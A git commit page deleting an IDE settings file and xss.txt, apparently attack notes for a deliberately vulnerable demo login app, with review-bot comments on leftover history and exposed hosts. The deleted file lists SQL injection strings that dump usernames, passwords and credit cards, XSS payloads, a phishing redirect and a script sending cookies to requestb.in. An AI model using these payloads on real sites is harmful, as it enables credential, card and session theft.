mark.george / jetty
Clean some rubbish.
Branch: master
1 parent 320b519
commit b7d28b16ad28c225f60ee8b41cb0944bfa433854
Mark George authored on 21 Feb 2019
Showing 2 changed files
nbproject/private/private.xml
xss.txt
nbproject/private/private.xml
100644 → 0
<?xml version="1.0" encoding="UTF-8"?> <project-private xmlns="http://www.netbeans.org/ns/project-private/1"> <editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/1"/> <editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/2" lastBookmarkId="0"/> <open-files xmlns="http://www.netbeans.org/ns/projectui-open-files/2"> <group> <file>file:/home/mark/work/projects/injection/src/java/servlets/LoginServlet.java</file> <file>file:/home/mark/work/projects/injection/web/awesome_login.jsp</file> </group> </open-files> </project-private>
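Review bot: deleting nbproject/private/private.xml (100644 → 0) takes it out of the tree, but nothing in this commit keeps it from being committed again; the change lists only the two deletions and no ignore rule. The file is per-user NetBeans state and carries absolute local paths under /home/mark/work/projects/injection/, so I would add nbproject/private/ to .gitignore in the same change. Note that the content stays readable from parent 320b519.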
xss.txt
100644 → 0
http://139.80.81.78:8080/injection/ // basic injection ' or 1=1;-- // get admin's credentials 'or 1=1 union select 'WOOHOO!' from users order by name desc; -- // get entire users table 'or 1=1 union select group_concat(username||':'||password||':'||name||':'||credit_card) from users as name order by name desc; -- // change color food<script>document.body.style.backgroundColor='#FF0000'</script> // change back button food<br/><a href="https://i.chzbgr.com/maxW500/4554986496/hF3327748/">Back</a><!-- // fake login <script>alert('Session timed out. Please log in to continue.');window.location='http://139.80.81.78:8080/injection/herephishyphishy.jsp'</script> // display cookies <script>alert(document.cookie)</script> // send cookies to request.bin <script>window.location='https://requestb.in/1jledlk1?'+document.cookie</script> // setting cookie via console document.cookie = "JSESSIONID=?"
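Review bot: the removed xss.txt names a specific host (139.80.81.78:8080) and a request-collector URL alongside the SQL injection and script payloads, and a delete commit (100644 → 0) leaves all of it retrievable from parent 320b519. If those addresses should not be public, the history has to be rewritten rather than the file deleted; if the notes are teaching material worth keeping, store them outside the web application tree with placeholder hosts. The commit message "Clean some rubbish." also does not say that attack notes and IDE metadata were removed, which makes this change hard to find later.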